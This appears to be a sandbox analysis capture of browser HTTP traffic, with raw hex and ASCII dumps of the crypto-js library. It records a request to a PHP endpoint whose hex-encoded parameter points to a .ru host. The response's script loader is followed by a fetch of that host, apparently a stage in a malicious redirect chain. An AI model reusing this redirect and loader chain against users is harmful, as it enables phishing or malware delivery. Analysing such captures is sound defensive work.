                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61
                                                                                              Data Ascii: =s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l.a
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78
                                                                                              Data Ascii: b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33
                                                                                              Data Ascii: (this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>>3
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d
                                                                                              Data Ascii: (n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.64971769.49.245.1724436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:49 UTC463OUTGET /res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood HTTP/1.1
                                                                                              Host: alternative-magic.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:49 UTC196INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:48 GMT
                                                                                              Server: Apache
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                              2024-12-19 13:35:49 UTC2026INData Raw: 37 64 65 0d 0a 20 20 20 20 76 61 72 20 6c 72 4d 6b 4c 77 6e 4f 58 41 68 55 6e 45 5a 48 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6c 72 4d 6b 4c 77 6e 4f 58 41 68 55 6e 45 5a 48 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6c 72 4d 6b 4c 77 6e 4f 58 41 68 55 6e 45 5a 48 29 3b 0d 0a 6c 72 4d 6b 4c 77 6e 4f 58 41 68 55 6e 45 5a 48 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                              Data Ascii: 7de var lrMkLwnOXAhUnEZH = document.createElement("script");lrMkLwnOXAhUnEZH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(lrMkLwnOXAhUnEZH);lrMkLwnOXAhUnEZH.onload=function()


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.649722104.17.24.144436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:51 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                              Host: cdnjs.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:52 UTC957INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:52 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: public, max-age=30672000
                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Content-Type-Options: nosniff
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 3
                                                                                              Expires: Tue, 09 Dec 2025 13:35:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2FJDiPXZNZwdrbtqYuXQv4pwHWX0EhDE0dXkk370fYxE7mMIx%2FU7DALLS7IoOZFmEry1weTJfpHRJ2%2FZ0ft0Mgkud5aD1SG8pvK6oEwv%2FWfe0MjjclyKTY18sRoe%2BXWdpzOsUS10"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c73e481f43a6-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:35:52 UTC412INData Raw: 33 39 37 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                              Data Ascii: 397c!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74
                                                                                              Data Ascii: indow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f
                                                                                              Data Ascii: o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functio
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73
                                                                                              Data Ascii: ),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcess
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a
                                                                                              Data Ascii: i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28
                                                                                              Data Ascii: 4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+(
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39
                                                                                              Data Ascii: 4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496729
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d
                                                                                              Data Ascii: ,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c
                                                                                              Data Ascii: .call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|
                                                                                              2024-12-19 13:35:52 UTC1369INData Raw: 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c
                                                                                              Data Ascii: ction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.649726172.67.155.684436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:53 UTC669OUTGET /hH7_CLfW8B06uDZbFmAiLw/ HTTP/1.1
                                                                                              Host: e4x6.gurativez.ru
                                                                                              Connection: keep-alive
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:54 UTC1242INHTTP/1.1 200 OK
